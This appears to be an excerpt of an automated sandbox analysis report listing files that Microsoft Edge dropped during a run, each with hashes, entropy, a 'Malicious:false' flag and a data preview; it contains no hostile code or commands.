                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.05397671699173755
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:GtStutquyStutqu1YR9XCChslotGLNl0ml/Vl/XoQXEl:MtquMtqu1YLpEjVl/PvoQ
                                                                                                                                                                                                                                                                                                                  MD5:1AD0FBB04808E36D979406A13B3B7E04
                                                                                                                                                                                                                                                                                                                  SHA1:F8591BEABD644F2E9C09BEE6E75F56321CCF8E54
                                                                                                                                                                                                                                                                                                                  SHA-256:2EFBB4F12B4E8CB9B1A2267E926AE46F9DFD699D89B2EAD8135BA6B2BC040638
                                                                                                                                                                                                                                                                                                                  SHA-512:BD84306880FFA099645F29D52725255FDBC8FF85CBF486CB23FA9B5AAF6C877A40F7BFEC4EA1F038717051E69B19D4B99C78C25D5B5086A5C66BD0C4930774D7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:..-.......................R...c.XE6.:..@...T.'...-.......................R...c.XE6.:..@...T.'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):86552
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8690829635730137
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:9jUx1uT/r8ZNsZzMNsDKO5NszeRNsdtf81B:kmztFSyMbU
                                                                                                                                                                                                                                                                                                                  MD5:54A40CCC717AFCF7D6E96CFADE35F3F6
                                                                                                                                                                                                                                                                                                                  SHA1:07A2F340C843D45C66C3DA673A0759FE8D621712
                                                                                                                                                                                                                                                                                                                  SHA-256:821DB7CEB920A217CCE8ABA8D1421E38C7F5A65F205E36C0592B3CBF85DA55FB
                                                                                                                                                                                                                                                                                                                  SHA-512:02D7FF68B02D1D1B06972EF1B8A79D6CAC43447A2503482D019945D66D7A6A27A75F2256198F7C8CA3ECB13ECAB0DF7DDE59F01590DF53EA8C8AE63945064C10
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:7....-...........XE6.:...,\...n..........XE6.:...^.J.~.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):419
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.687911912587677
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/XntM+dll3sedhO38WrOuuuuuuuuuuuu7PsedhO7:lllc8zWrOuuuuuuuuuuuuw82
                                                                                                                                                                                                                                                                                                                  MD5:ECDCAC95AEC341266F1B5326A9B90329
                                                                                                                                                                                                                                                                                                                  SHA1:447E77E61184060EFC823046422BA46B15AC3E54
                                                                                                                                                                                                                                                                                                                  SHA-256:A606DACE3EE13FC459C6D388BCD7C320B9AB8F710E6015C6802C8E51BD332360
                                                                                                                                                                                                                                                                                                                  SHA-512:351C26EDD593F9A070AA8A260571DD01FEB9253F92B13B920AD446F262E0CFA150CBC7885603E19C6C2293CF943D2075F1B75B10E0E41D64F3347F6E648366A0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1....0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................b0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.205245200715467
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HE9eyq2PCHhJ23oH+TcwtfrK+IFUt8YE9I1Zmw+YEFi1RkwOCHhJ23oH+TcwtfrF:kBvBYeb23FUt8/61/+/656Yeb3J
                                                                                                                                                                                                                                                                                                                  MD5:8D12BBC212DD3FBF55C10E31DB7DCBBB
                                                                                                                                                                                                                                                                                                                  SHA1:22F21723C1ACE3F8085AA3420B9E2864551059EC
                                                                                                                                                                                                                                                                                                                  SHA-256:CC795285257A9F2C6431DBF6095946DDF23772D4B6E83C2E7440C57588FF46EC
                                                                                                                                                                                                                                                                                                                  SHA-512:B0D4D6A864E73E2CBF441EA02E861E918B25E25BC621ACBD06546B0DEDD0EAB2098A83FC2C115DE491DE4D878C7B185EACEDFB449BA0425E382B3F1020D09B6D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.449 4c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/21-09:48:29.449 4c0 Recovering log #3.2024/11/21-09:48:29.450 4c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.205245200715467
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HE9eyq2PCHhJ23oH+TcwtfrK+IFUt8YE9I1Zmw+YEFi1RkwOCHhJ23oH+TcwtfrF:kBvBYeb23FUt8/61/+/656Yeb3J
                                                                                                                                                                                                                                                                                                                  MD5:8D12BBC212DD3FBF55C10E31DB7DCBBB
                                                                                                                                                                                                                                                                                                                  SHA1:22F21723C1ACE3F8085AA3420B9E2864551059EC
                                                                                                                                                                                                                                                                                                                  SHA-256:CC795285257A9F2C6431DBF6095946DDF23772D4B6E83C2E7440C57588FF46EC
                                                                                                                                                                                                                                                                                                                  SHA-512:B0D4D6A864E73E2CBF441EA02E861E918B25E25BC621ACBD06546B0DEDD0EAB2098A83FC2C115DE491DE4D878C7B185EACEDFB449BA0425E382B3F1020D09B6D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.449 4c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/21-09:48:29.449 4c0 Recovering log #3.2024/11/21-09:48:29.450 4c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):753
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                                                                  MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                                                                  SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                                                                  SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                                                                  SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.194863260263907
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEVjyq2PCHhJ23oH+TcwtfrzAdIFUt8YEV11Zmw+YEnylRkwOCHhJ23oH+Tcwtfa:kAvBYeb9FUt8/r1/+/n656Yeb2J
                                                                                                                                                                                                                                                                                                                  MD5:005D5E4F94CD4CA5F393EA46B741CEEA
                                                                                                                                                                                                                                                                                                                  SHA1:CBCA70F93B95CA68418A92B98B6DA15C13F884FC
                                                                                                                                                                                                                                                                                                                  SHA-256:6FDCE0D1073AA0049D167CB1093BF3A2C267F106A77F571ED22A1AC47B6C8005
                                                                                                                                                                                                                                                                                                                  SHA-512:E8298824C00B5339D8A7C54E0059A8DE03EE4E2FF456787712D20B90EC436B22E6B1E94D988CF0EB79A84C0E06D390B50D78DE31DD141170EFEFE5D6B2029004
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.206 4c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/21-09:48:29.206 4c0 Recovering log #3.2024/11/21-09:48:29.429 4c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.194863260263907
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEVjyq2PCHhJ23oH+TcwtfrzAdIFUt8YEV11Zmw+YEnylRkwOCHhJ23oH+Tcwtfa:kAvBYeb9FUt8/r1/+/n656Yeb2J
                                                                                                                                                                                                                                                                                                                  MD5:005D5E4F94CD4CA5F393EA46B741CEEA
                                                                                                                                                                                                                                                                                                                  SHA1:CBCA70F93B95CA68418A92B98B6DA15C13F884FC
                                                                                                                                                                                                                                                                                                                  SHA-256:6FDCE0D1073AA0049D167CB1093BF3A2C267F106A77F571ED22A1AC47B6C8005
                                                                                                                                                                                                                                                                                                                  SHA-512:E8298824C00B5339D8A7C54E0059A8DE03EE4E2FF456787712D20B90EC436B22E6B1E94D988CF0EB79A84C0E06D390B50D78DE31DD141170EFEFE5D6B2029004
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.206 4c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/21-09:48:29.206 4c0 Recovering log #3.2024/11/21-09:48:29.429 4c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF367e3.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3689e.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36a34.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
